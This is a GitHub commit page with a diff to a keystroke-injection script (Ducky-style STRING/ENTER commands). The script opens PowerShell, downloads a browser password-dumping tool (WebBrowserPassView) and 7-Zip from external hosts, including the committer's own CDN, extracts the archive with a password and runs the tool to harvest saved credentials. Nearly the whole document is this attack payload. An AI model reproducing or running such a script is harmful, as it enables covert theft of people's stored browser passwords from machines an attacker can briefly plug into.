Fixed an error with expanding the archive.

Upon expanding the archive originally, it would throw an error. Resolved this by repacking the archive and reuploading the files to my CDN. Feel free to check the checksum to verify the files are the same :D

Here is a screenshot of the initial issue https://cdn.lullaby.cafe/img/Mv3hqPUcrh0VrMP.png
This commit is contained in:
jbohack 2023-02-23 20:15:39 -05:00 committed by GitHub
parent b03945da99
commit dae2dd1b7b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -3,10 +3,12 @@ DELAY 1000
STRING powershell
ENTER
DELAY 1000
STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Headers @{'Referer' = 'http://www.nirsoft.net/utils/web_browser_password.html'} -Uri http://www.nirsoft.net/toolsdownload/webbrowserpassview.zip -OutFile wbpv.zip ; Invoke-WebRequest -Uri https://www.7-zip.org/a/7za920.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e wbpv.zip
ENTER
DELAY 5000
STRING wbpv28821@
DELAY 1000
STRING rmdir -R \temp
ENTER
DELAY 1000
STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/webpassview.zip -OutFile webpassview.zip ; Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/7z.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e webpassview.zip
ENTER
STRING .\WebBrowserPassView.exe
ENTER
@ -31,4 +33,4 @@ ENTER
STRING rmdir -R \temp
ENTER
STRING EXIT
ENTER
ENTER